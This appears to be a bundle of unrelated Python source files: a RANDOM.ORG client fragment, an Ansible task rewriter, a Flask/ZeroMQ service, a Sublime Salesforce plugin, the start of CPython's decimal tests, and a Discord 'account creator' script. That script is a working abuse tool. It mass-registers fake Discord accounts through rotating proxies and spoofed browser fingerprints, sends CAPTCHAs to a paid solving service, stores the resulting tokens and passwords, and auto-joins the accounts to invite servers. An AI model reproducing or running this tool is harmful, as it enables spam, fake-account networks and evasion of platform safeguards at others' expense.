# RandomOrgInsufficientRequestsError, requests allowance
# exceeded, backoff until midnight UTC, from RANDOM.ORG
# Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 402:
self._backoff = datetime.utcnow().replace(day=datetime.utcnow().day+1, hour=0,
minute=0, second=0, microsecond=0)
self._backoff_error = 'Error ' + str(code) + ': ' + message
return { 'exception': RandomOrgInsufficientRequestsError(self._backoff_error) }
# RandomOrgInsufficientBitsError, bits allowance exceeded,
# from RANDOM.ORG Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 403:
return { 'exception': RandomOrgInsufficientBitsError('Error ' +
str(code) + ': ' + message) }
# ValueError, error codes listed under RANDOM.ORG Errors:
# https://api.random.org/json-rpc/1/error-codes
else:
return { 'exception': ValueError('Error ' + str(code) + ': ' + message) }
# Update usage stats
if 'requestsLeft' in data['result']:
self._requests_left = int(data['result']['requestsLeft'])
self._bits_left = int(data['result']['bitsLeft'])
# Set new server advisory delay
self._advisory_delay_lock.acquire()
if 'advisoryDelay' in data['result']:
# Convert millis to decimal seconds.
# self._advisory_delay = long(data['result']['advisoryDelay']) / 1000.0
self._advisory_delay = int(data['result']['advisoryDelay']) / 1000.0
else:
# Use default if none from server.
self._advisory_delay = _DEFAULT_DELAY
self._last_response_received_time = time.process_time()
self._advisory_delay_lock.release()
return { 'response': data }
def _get_usage(self):
# Issue a getUsage request to update bits and requests left.
params = { 'apiKey':self._api_key }
request = self._generate_request(_GET_USAGE_METHOD, params)
response = self._send_request(request)
def _generate_request(self, method, params):
# Base json request.
return { 'jsonrpc':'2.0', 'method':method, 'params':params, 'id':uuid.uuid4().hex }
def _extract_response(self, response):
# Gets random data.
return response['result']['random']['data']
def _extract_signed_response(self, response, extract_function):
# Gets all random data and signature.
return { 'data':extract_function(response),
'random':response['result']['random'],
'signature':response['result']['signature'] }
def _extract_verification_response(self, response):
# Gets verification boolean.
return bool(response['result']['authenticity'])
def _extract_ints(self, response):
# json to integer list.
return map(int, self._extract_response(response))
def _extract_doubles(self, response):
# json to double list.
return map(float, self._extract_response(response))
def _extract_strings(self, response):
# json to string list (no change).
return self._extract_response(response)
def _extract_UUIDs(self, response):
# json to UUID list.
return map(uuid.UUID, self._extract_response(response))
def _extract_blobs(self, response):
# json to blob list (no change).
return self._extract_response(response)
|
rewrite_ansiblenew.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ruamel.yaml
import textwrap
import argparse
import copy
import json
import logging
import os
import re
import six
import sys
import time
import traceback
import ruamel.yaml
from threading import Thread
from subprocess import PIPE, Popen
from collections import OrderedDict
from ruamel.yaml.scalarstring import DoubleQuotedScalarString
try:
from queue import Queue
except ImportError:
from Queue import Queue
from ruamel.yaml.representer import (
RoundTripRepresenter,
CommentedOrderedMap,
CommentedMap,
)
for typ in [
OrderedDict, dict, CommentedMap, CommentedOrderedMap
]:
RoundTripRepresenter.add_representer(
typ, RoundTripRepresenter.represent_dict)
J = os.path.join
B = os.path.basename
D = os.path.dirname
A = os.path.abspath
R = os.path.relpath
OW = os.getcwd()
W = A(R(D(__file__)))
TOP = D(W)
RE_F = re.U | re.M
N = os.path.basename(__file__)
BN = os.path.basename(N)
_LOGGER = 'cops.{0}'.format(BN)
_LOGGER_FMT = '%(asctime)s:%(levelname)s:%(name)s:%(message)s'
_LOGGER_DFMT = '%m/%d/%Y %I:%M:%S %p'
_HELP = '''\
Rewrite tasks files for new ansible forms
Main usage:
- {N} taskfilepath1 taskfilepath2
'''.format(N=N)
registry_knobs = [
"cops_do_format_resolve", "cops_computed_defaults",
"cops_flavors", "cops_sub_os_append", "cops_lowered",
"cops_knobs", "cops_sub_namespaces"]
def read_output(pipe, funcs):
for line in iter(pipe.readline, ''):
for func in funcs:
func(line.decode('utf-8'))
pipe.close()
def write_output(get):
for line in iter(get, None):
sys.stdout.write(line)
def run_cmd(command,
shell=True,
cwd=None,
env=None,
stdout=None,
stderr=None,
passthrough=True):
if stderr is None:
stderr = PIPE
if stdout is None:
stdout = PIPE
if env is None:
env = os.environ.copy()
outs, errs = None, None
proc = Popen(
command,
cwd=cwd,
env=env,
shell=shell,
close_fds=True,
stdout=stdout,
stderr=stderr,
bufsize=1)
if passthrough:
outs, errs = [], []
q = Queue()
stdout_thread = Thread(
target=read_output, args=(proc.stdout, [q.put, outs.append]))
stderr_thread = Thread(
target=read_output, args=(proc.stderr, [q.put, errs.append]))
writer_thread = Thread(target=write_output, args=(q.get,))
for t in (stdout_thread, stderr_thread, writer_thread):
t.daemon = True
t.start()
proc.wait()
for t in (stdout_thread, stderr_thread):
t.join()
q.put(None)
outs = ''.join(outs)
errs = ''.join(errs)
else:
outs, errs = proc.communicate()
outs = '' if outs is None else outs.decode('utf-8')
errs = '' if errs is None else errs.decode('utf-8')
rc = proc.returncode
return (rc, (outs, errs))
def splitstrip(a, *s):
return [b.strip() for b in a.split(*s)]
def shellexec(cmd, quiet=False, *args):
msg = 'shellexec {0}'
if args:
msg += ' {1}'
debug(msg.format(cmd, args))
ret = run_cmd(cmd, passthrough=not quiet)
return ret
def setup_logging(fmt=_LOGGER_FMT, datefmt=_LOGGER_DFMT, level=logging.INFO):
logging.basicConfig(format=fmt, datefmt=datefmt, level=level)
def log(msg, name=_LOGGER, level='info'):
logger = logging.getLogger(name)
return getattr(logger, level.lower())(msg)
def debug(*a, **kwargs):
kwargs['level'] = 'debug'
return log(*a, **kwargs)
def parse_cli():
parser = argparse.ArgumentParser(usage=_HELP)
parser.add_argument(
'tasksfiles',
nargs='*',
default=[],
help='tasksfiles to rewrite')
parser.add_argument(
'--log-level',
default=os.environ.get('LOGLEVEL', 'info'),
help='loglevel')
args = parser.parse_args()
return args, vars(args), parser
def represent_dict_order(self, data):
self.represent_mapping('tag:yaml.org,2002:map', data.items())
class Acfg(object):
def __init__(self, cfg, autoload=True):
self.cfg = cfg
self.orig = None
self.data = OrderedDict()
yaml = self.yaml = ruamel.yaml.YAML(typ='rt')
yaml.allow_duplicate_keys = True
yaml.explicit_start = True
# yaml.default_style = '"'
yaml.preserve_quotes = True
yaml.default_flow_style = True
yaml.line_break = 0
yaml.explicit_start = True
yaml.indent(sequence=2)
yaml.width = 8000
yaml.canonical = False
if autoload:
self.load()
@property
def exists(self):
return os.path.exists(self.cfg)
def load(self):
if self.exists:
with open(self.cfg) as fic:
self.orig = fic.read()
# self.yaml.width = max([len(a) for a in self.orig.splitlines()])
self.data = self.yaml.load(self.orig)
def write(self, ncfg=None, transform=None):
if not ncfg:
ncfg = self.cfg
if not os.path.exists(D(ncfg)):
os.makedirs(D(ncfg))
with open(ncfg, 'w') as fic:
# self.yaml.compact(seq_seq=False, seq_map=False)
self.yaml.dump(self.data, fic, transform=transform)
def transform_when(content, *args, **kw):
lines = []
# content = content.replace('\\\n', 'REPLACEANTISLASH')
# content = re.sub(r'REPLACEANTISLASH[^\\]+\\', '', content)
for line in content.splitlines():
if re.search('when: "\(.*\)"$', line):
for splitter in ' or', ' and':
line = '{0}\n'.format(splitter).join(
[(ix < 1 and a or '{1}{0}'.format(a, (1+line.find('"')) * " "))
for ix, a in enumerate(line.split(splitter))])
lines.append(line)
return "\n".join(lines)
def rewrite_taskfile(taskfile_path):
cfg = Acfg(taskfile_path)
taskfile_name = os.path.split(taskfile_path)[-1]
rewrite = False
S = ruamel.yaml.scalarstring.PreservedScalarString
if isinstance(cfg.data, list):
for item in cfg.data:
pkg = item.get('package', None)
if not pkg:
continue
try:
toinstall = item['loop']
except KeyError:
continue
if re.match('^{{[^}]+}}$', pkg['name']):
pkg['name'] = toinstall
item.pop('loop')
rewrite = True
if rewrite:
log('Rewrite {}'.format(taskfile_path))
cfg.write(transform=transform_when)
def main():
args, vargs, parser = parse_cli()
setup_logging(level=getattr(logging, vargs['log_level'].upper()))
log('build started', level='debug')
tasksfiles = []
cwd = os.getcwd()
for taskfile in args.tasksfiles:
if os.path.sep not in taskfile:
taskfile = J(cwd, taskfile)
tasksfiles.append(taskfile)
for taskfile in tasksfiles:
rewrite_taskfile(taskfile)
if __name__ == '__main__':
main()
# vim:set et sts=4 ts=4 tw=80:
|
web_to_zeromq.py
|
"""
For this module to work, the following SSL certificate files must be placed in ../synth_accounts/:
ssl.crt
ssl.key
Flask occasionally just stops responding to web requests (like every day or so) - no idea why. So we rely on an external service (e.g. Pingdom or UptimeRobot) to ping us regularly and then, knowing that that is happening, if we don't recive any messages then we know to restart the server.
GET /?<magickey>
----------------
Return a basic page listing all running Synth processes and free memory.
For security this must be accompanied by a magic key matching the "web_check_key" property in the file ../synth_accounts/default.json
GET /spawn?devicepilot_key=XXX&devicepilot_api=staging
------------------------------------------------------
Spawn a new instance of Synth, with these two specific parameters set. The UserDemo scenario is run.
The instance_name is set to be "devicepilot_key=XXX" since that is assumed to be unique.
GET /is_running?devicepilot_key=XXX&devicepilot_api=staging
-----------------------------------------------------------
Find whether a specific instance of Synth (identified by its key) is still running. Return a JSON struct with active=true/false.
GET /plots/<filename>
---------------------
Return a plot generated by the Expect device function
POST /event
-----------
This causes an inbound device event to be asynchronously generated, to a specific device on a specific Synth instance.
The header of the web request must contain the following::
Key : <web_key parameter>
Instancename : <instance_name parameter>
The body of the web request must contain a JSON set include the following elements::
"deviceId" : "theid"
"eventName" : "replace_battery" | "upgradeFirmware" | "factoryReset"
"arg" : "0.7" - optional argument only relevant for some eventNames
If defining a Webhook Action in DevicePilot to create a Synth event, the device ID will be automatically filled-out if you define it as {device.$id},
resulting in an action specification which looks something like this::
method: POST
url: https://synthservice. com/event
headers: { "Key":"mywebkey", "Instancename" : "OnProductionAccountUser" }
body: { "deviceId" : "{device.$id}", "eventName" : "upgadeFirmware", "arg":"0.7"}
"""
# Copyright (c) 2017 DevicePilot Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# It seems generally accepted that API POSTs should take no more than 2 seconds, so we need
# to be pretty responsive. So we run Flask in Threaded mode, and protect child code for re-entrancy
# where necessary.
#
# We also run Flask in its own *Process*.
# WARNING: it appears that if you bind ZMQ to a socket on multiple processes
# then the second one fails *silently*! So don't call socket_send() from the parent
# process, or Flask's ZMQ sends will all fail silently.
from flask import Flask, request, abort
from flask_cors import CORS, cross_origin
import multiprocessing, subprocess, threading
import json, time, logging, sys, re, datetime
import zeromq_tx
WEB_PORT = 80 # HTTPS. If < 1000 then this process must be run with elevated privileges
PING_TIMEOUT = 60*10 # We expect to get pinged every N seconds
CERT_DIRECTORY = "../synth_accounts/"
DEFAULTS_FILE = "../synth_accounts/default.json"
g_lock = None
g_last_ping_time = multiprocessing.Value('d', time.time())
app = Flask(__name__)
CORS(app) # Make Flask tell browser that cross-origin requests are OK
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
def note_arrival(route):
global g_last_ping_time
g_last_ping_time.value = time.time()
logging.info("Got web request to "+route)
@app.route("/event", methods=['POST','GET'])
def event():
"""Accept an incoming event and route it to a Synth instance."""
note_arrival("/event")
h = {}
for (key,value) in request.headers:
h[key] = value
packet = {
"action" : "event",
"headers" : h,
"body" : request.get_json(force=True)
}
logging.info(str(packet))
zeromq_tx.socket_send(packet)
return "ok"
def getAndCheckKey(req):
if not "devicepilot_key" in req.args:
logging.error("Missing devicepilot_key argument")
return None
dpKey = req.args["devicepilot_key"]
# Defend against injection attack
if len(dpKey) != 32:
logging.error("Bad key length")
return None
if re.search(r'[^a-z0-9]', dpKey):
logging.error("Bad key characters")
return None
return dpKey
def getAndCheckApi(req):
"""Stop external users passing-in any old URL."""
if not "devicepilot_api" in req.args:
dpApi = "api"
else:
dpApi = req.args["devicepilot_api"]
# Defend against injection attack
if not dpApi in ["api","api-staging","api-development"]:
dpApi = "api"
return "https://"+dpApi+".devicepilot.com"
@app.route("/spawn", methods=['GET'])
def spawn():
"""Start a new Synth instance."""
note_arrival("/spawn")
dpKey = getAndCheckKey(request)
if dpKey==None:
abort(403)
dpApi = getAndCheckApi(request)
packet = { "action" : "spawn", "key" : dpKey, "api" : dpApi }
zeromq_tx.socket_send(packet)
logging.info("Sent packet "+str(packet))
time.sleep(1) # If client next immediately tests <is_running>, this will vastly increase chances of that working
return "ok"
@app.route("/plots/<filename>", methods=['GET'])
def plots(filename):
"""Serve plots from special directory"""
note_arrival(str(request.path))
logging.info(" so filename is "+str(filename))
if re.search(r'[^A-Za-z0-9.]', filename):
for c in filename:
logging.info(str(ord(c)))
logging.info("Illegal .. in pathname")
abort(400)
try:
f=open("../synth_logs/plots/"+filename).read()
except:
logging.warning("Can't open file")
return ("Can't open that file")
return f
@app.route("/is_running")
def isRunning():
note_arrival("/is_running")
dpKey = getAndCheckKey(request)
if dpKey==None:
abort(403)
try:
x = subprocess.check_output("ps uax | grep 'python' | grep 'devicepilot_key=" + dpKey + "' | grep -v grep", shell=True)
except:
return '{ "active" : false }'
return '{ "active" : true }'
@app.route("/ping")
def ping():
"""We expect Pingdom to regularly ping this route to reset the heartbeat."""
note_arrival("/ping")
zeromq_tx.socket_send({"action": "ping"}) # Propagate pings into ZeroMQ for liveness logging throughout rest of system
return "pong"
@app.route("/")
def whatIsRunning():
note_arrival("/")
try:
magicKey=json.loads(open(DEFAULTS_FILE,"rt").read())["web_check_key"]
except:
logging.error("Unable to find web_check_key parameter in "+DEFAULTS_FILE)
raise
if magicKey not in request.args:
logging.error("Incorrect or missing magic key in request")
abort(403)
try:
x = subprocess.check_output("ps uax | grep 'python' | grep -v grep", shell=True)
x += "<br>"
x += subprocess.check_output("free -m", shell=True)
except:
return "Nothing"
return "<pre>"+x.replace("\n","<br>")+"</pre>"
# DO NOT CALL zeromq_tx.socket_send() BELOW HERE, OR YOU WILL BORK IT
def start_web_server(restart):
"""Doing app.run() with "threaded=True" starts a new thread for each incoming request, improving crash resilience. However this then means that everything here (and everything it calls) has to be re-entrant. So don't do that.
By default Flask serves to 127.0.0.1 which is local loopback (not externally-visible), so use 0.0.0.0 for externally-visible
We run entire Flask server as a distinct process so we can terminate it if it fails (can't terminate threads in Python)"""
logging.info("Starting web server at "+datetime.datetime.now().ctime())
zeromq_tx.init()
args = { "threaded":True,
"host":"0.0.0.0",
"port":WEB_PORT
}
logging.info("Starting Flask server with args : "+json.dumps(args))
p = multiprocessing.Process(target=app.run, kwargs=args)
p.daemon = True
p.start()
return p
if __name__ == "__main__":
server = start_web_server(restart=False)
while True:
time.sleep(1)
if time.time()-g_last_ping_time.value > PING_TIMEOUT:
logging.critical("Web server not detecting pings - restarting")
server.terminate()
time.sleep(5)
server = start_web_server(restart=True)
g_last_ping_time.value = time.time()
time.sleep(60)
|
document.py
|
import sublime, sublime_plugin
import xml.etree.ElementTree as ElementTree
import os
import datetime
import threading
import urllib
from . import requests, context, util
from .progress import ThreadProgress
from .salesforce.lib.panel import Printer
class ReloadSalesforceDocumentCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSalesforceDocumentCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Generally, you should reload it every salesforce release, " +\
"do you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Continue Reloading?"): return
settings = context.get_settings()
self.rd = ReloadDocument(settings["docs"])
thread = threading.Thread(target=self.rd.reload_document)
thread.start()
message = "Reloading Salesforce Document Reference"
ThreadProgress(self.rd, thread, message, message + " Succeed")
self.handle_thread(thread)
def handle_thread(self, thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:self.handle_thread(thread), timeout)
return
# Exception Process
if not self.rd.result: return
result = self.rd.result
salesforce_reference = sublime.load_settings("salesforce_reference.sublime-settings")
salesforce_reference.set("salesforce_reference", result)
sublime.save_settings("salesforce_reference.sublime-settings")
class ReloadDocument():
def __init__(self, docs, **kwargs):
self.docs = docs
self.result = None
def reload_document(self):
# Log the StartTime
start_time = datetime.datetime.now()
# Start retriving docs
Printer.get("log").write_start().write("Start to reload document reference")
title_link = {}
for prefix in self.docs:
doc_attr = self.docs[prefix]
Printer.get("log").write("Reloading %s" % prefix)
xml_url = 'http://www.salesforce.com/us/developer/docs/%s/Data/Toc.xml' % doc_attr["keyword"]
try:
res = requests.get(xml_url, headers={"Accept": "application/xml"})
except Exception as e:
Printer.get("log").write("Reloading %s Failed" % prefix)
continue
tree = ElementTree.fromstring(res.content)
leaf_parents = tree.findall(doc_attr["pattern"])
for parent in leaf_parents:
parent_title = parent.attrib["Title"]
if "Link" not in parent.attrib: continue
title_link[prefix + "=>" + parent_title] = {
"url": parent.attrib["Link"],
"attr": doc_attr["keyword"]
}
if " Methods" in parent_title:
parent_title = parent_title.replace(" Methods", ".")
else:
parent_title = parent_title + " "
for child in parent.getchildren():
title_link[prefix + "=>" + parent_title + child.attrib["Title"]] = {
"url": child.attrib["Link"],
"attr": doc_attr["keyword"]
}
# Build Successful
Printer.get("log").write("RELOADING SUCCESSFUL")
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get("log").write("Total time: %s seconds" % total_seconds)
# Hide panel
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
self.result = title_link
class OpenDocumentationCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(OpenDocumentationCommand, self).__init__(*args, **kwargs)
def run(self):
reference_settings = sublime.load_settings("salesforce_reference.sublime-settings")
self.title_link = reference_settings.get("salesforce_reference")
self.titles = sorted(self.title_link.keys())
self.window.show_quick_panel(self.titles, self.open_documentation)
def open_documentation(self, index):
if index == -1: return
link = self.title_link[self.titles[index]]
show_url= 'http://www.salesforce.com/us/developer/docs/%s%s' % (link["attr"], link["url"])
util.open_with_browser(show_url)
def is_enabled(self):
reference_settings = sublime.load_settings("salesforce_reference.sublime-settings")
return reference_settings.has("salesforce_reference")
|
account creator.py
|
import requests
import json
import sys
import random
import string
import os
import time
from colorama import init, Fore
import queue
import turkce_isimler
import threading
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
init()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
proxies_q = queue.Queue()
predefinedNames = []
def random_nick(_file):
conf = open(_file, 'r', encoding='utf-8')
_lines = conf.readlines()
return random.choice(_lines).lstrip().rsplit()
def debug(text, conf):
if conf['debug']:
print("[DEBUG] "+str(text))
def read_configurations():
try:
conf = json.loads(
open('config/config.json', 'r', encoding='utf-8').read())
print("Configuration loaded! Starting workers!")
return conf
except:
print("Failed to load config.json")
sys.exit(1)
def array_to_queue(arr, q):
for i in arr:
q.put(i)
return q
def getGenericHeader():
return {
'Host': 'getinboxes.com',
'Accept': '*/*',
'Accept-Language': 'en-US',
'Content-Type': 'application/json',
'DNT': '1',
'Connection': 'keep-alive'
}
def getInfo():
id = random.randint(1, 7)
if id == 1:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "69.0.3497.100", "10")
elif id == 2:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763", "18.17763", "10")
elif id == 3:
return ("Windows", "Edge", "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "60.0.3112.90", "XP")
elif id == 4:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "60.0.3112.113", "8.1")
elif id == 5:
return ("Windows", "Internet Explorer", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko", "11.0", "7")
elif id == 6:
return ("Windows", "Firefox", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0", "54.0", "7")
elif id == 7:
return ("Windows", "Firefox", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "66.0", "10")
def get_headers():
return {
'Host': 'discordapp.com',
'Accept': '*/*',
'Accept-Language': 'en-US',
'Content-Type': 'application/json',
'Referer': 'https://discordapp.com/register',
'Origin': 'https://discordapp.com',
'DNT': '1',
'Connection': 'keep-alive'
}
def getSuperProp(os, browser, useragent, browser_version, os_version, client_build):
return {
"os": os,
"browser": browser,
"device": "",
"browser_user_agent": useragent,
"browser_version": browser_version,
"os_version": os_version,
"referrer": "",
"referring_domain": "",
"referrer_current": "",
"referring_domain_current": "",
"release_channel": "stable",
"client_build_number": client_build,
"client_event_source": None
}
sys.path.append("././.")
def get_random_string(length):
letters = string.ascii_letters
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def generateUUID():
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
uuidlength = 32
uuid = ""
for i in range(uuidlength):
uuid = uuid + alphabet[random.randrange(len(alphabet))]
return uuid
def sunucuya_sok(token, davet_kodlari):
for davet_linki in davet_kodlari:
param = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.301 Chrome/56.0.2924.87 Discord/1.6.15 Safari/537.36",
"authority": "discordapp.com",
"method": "POST",
"path": f"/api/v6/invite/{davet_linki}",
"scheme": "https",
"accept": "*/*",
"accept-encoding": "gzip, deflate",
"accept-language": "en-US",
"authorization": token,
"content-length": "0",
"origin": "https://discordapp.com",
"referer": "http://discordapp.com/channels/@me"
}
source = requests.post(
f"https://discordapp.com/api/v6/invite/{davet_linki}", headers=param)
def get_info(token):
r = requests.get("https://discord.com/api/v8/users/@me",
headers={"Authorization": f"{token}"}, verify=False)
return r.json()
def register(email, username, password, proxy, conf):
headers = get_headers()
genericHeaders = getGenericHeader()
os, browser, headers['user-agent'], browserver, osvers = getInfo()
genericHeaders['user-agent'] = headers['user-agent']
s = requests.Session()
if proxy != None:
proxies = {
'http': 'http://' + proxy,
'https': 'https://' + proxy
}
s.proxies.update(proxies)
fingerprint_json = s.get("https://discordapp.com/api/v6/experiments",
timeout=conf['timeout'], headers=headers, verify=False).text
fingerprint = json.loads(fingerprint_json)["fingerprint"]
debug("Finger print: " + fingerprint, conf)
xsuperprop = base64.b64encode(json.dumps(getSuperProp(
os, browser, headers['user-agent'], browserver, osvers, 36127), separators=",:").encode()).decode()
debug("X-Super-Properties: " + xsuperprop, conf)
time.sleep(conf['sleepdelay'])
headers['X-Super-Properties'] = xsuperprop
headers['X-Fingerprint'] = fingerprint
payload = {
'fingerprint': fingerprint,
'email': email,
'username': username,
'password': password,
'invite': None,
'captcha_key': None,
'consent': True,
"date_of_birth": "1997-04-24",
'gift_code_sku_id': None
}
uuid = generateUUID()
#print("first registration post "+email+":"+username+":"+password, conf)
messages = f'{Fore.LIGHTRED_EX}--------------------{Fore.RESET}\nMail: {email}\nUsername: {username}\nPassword: {password}\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}'
print(messages)
response = s.post('https://discordapp.com/api/v6/auth/register',
json=payload, headers=headers, timeout=conf['timeout'], verify=False)
time.sleep(conf['sleepdelay'])
captchaRequired = False
if 'captcha-required' in response.text:
print("Captcha is required to verify user.")
captchaRequired = True
if 'You are being rate limited.' in response.text:
print("You are being rate limited.")
return False
if 'Email is already registered.' in response.text:
print("Already registered")
return False
if 'Please update Discord to continue.' in response.text:
print("Please update Discord to continue.")
return False
if 'response-already-used-error' in response.text:
print("Captcha response already used once. Returning.")
return False
if captchaRequired:
if conf['skip_if_captcha']:
return False
ss = requests.Session()
time.sleep(conf['sleepdelay'])
debug("fetching captcha", conf)
API_KEY = conf["captchakey"]
site_key = conf["sitekey"]
discord_url_s = 'https://discordapp.com/api/v6/auth/register'
captcha_id = ss.get("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(
API_KEY, site_key, discord_url_s)).text.split('|')[1]
recaptcha_answer = ss.get(
"http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
#print(f"{Fore.CYAN}Captcha Çözülüyor...")
while 'CAPCHA_NOT_READY' in recaptcha_answer:
time.sleep(5)
recaptcha_answer = ss.get(
"http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
recaptcha_answer = recaptcha_answer.split('|')[1]
debug("Result: "+recaptcha_answer, conf)
payload['captcha_key'] = recaptcha_answer
debug("sending payload: "+str(payload), conf)
time.sleep(conf['sleepdelay'])
response = s.post('https://discordapp.com/api/v6/auth/register',
json=payload, headers=headers, timeout=conf['timeout'], verify=False)
debug(response.json(), conf)
token = response.json()['token']
file = open('token_gen.txt', 'a')
file.writelines(token + '\n')
file.close()
try:
_info = get_info(token)
_id = _info['id']
_discriminator = _info['discriminator']
file2 = open('accounts.txt', 'a')
_datam = f"\nMail: {email}\nUsername: {username}\nDiscriminator: {_discriminator}\nID: {_id}\nPassword: {password}\nToken: {token}\n\n\n"
file2.writelines(_datam)
file2.close()
except:
pass
print(f'{Fore.CYAN}Account Generated\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}\n{Fore.CYAN}Mail: {Fore.LIGHTGREEN_EX}{email}\n{Fore.CYAN}Username: {Fore.LIGHTGREEN_EX}{username}#{_discriminator}\n{Fore.CYAN}Token: {Fore.LIGHTGREEN_EX}{token}\n{Fore.LIGHTRED_EX}--------------------{Fore.RESET}')
davet_kodlari = conf["invite_codes"]
davet_kodlari = davet_kodlari.split(',')
sunucuya_sok(token, davet_kodlari)
return True
if 'unauthorize' in response.text:
debug('unauthorized', conf)
return False
def worker(conf):
debug("worker started", conf)
proxy = None
if conf['use_proxies']:
proxies_used_file = conf['usedproxies']
try:
proxies_used = open(proxies_used_file).read()
except:
proxies_used = ''
proxy = proxies_q.get()
proxies_q.task_done()
while proxies_used.count(proxy) > 2 and not proxies_q.empty():
proxy = proxies_q.get()
proxies_q.task_done()
open(proxies_used_file, 'a').write(proxy+'\n')
if conf["username"] == 'random':
username = turkce_isimler.rastgele_isim_al()
elif conf["username"] == "file":
_file = conf["usernames"]
username = random_nick(_file)[0]
else:
# Aynı kullanıcı adı ile çok sayıda hesaplar açılırsa taglar biter o yüzden bu kodu yanına ekleyin kullanıcı adının yanında random karakterler oluşturmak için[ {get_random_string(3)} ]
username = f'{conf["username"]}'
password = f'{conf["password"]}'
email = f'{get_random_string(7)}@gmail.com'
try:
if not register(email, username, password, proxy, conf):
print("Fail")
worker(conf)
else:
print("Successfully made a account.")
open(proxies_used_file, 'a').write(proxy+'\n')
worker(conf)
except:
worker(conf)
pass
def runIt(conf):
tx = []
debug("Starting "+str(conf['nb_threads'])+" threads", conf)
for i in range(conf['nb_threads']):
mT = threading.Thread(target=worker, args=(conf, ))
mT.daemon = True
mT.start()
tx.append(mT)
for t in tx:
t.join(75)
def main():
global proxies_q
global predefinedNames
conf = read_configurations()
proxies = [x.rstrip() for x in open(conf['proxy_file'], 'r').readlines()]
proxies_q = array_to_queue(proxies, proxies_q)
debug("Starting "+str(conf['nb_threads'])+" threads", conf)
while 1:
runIt(conf)
main()
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
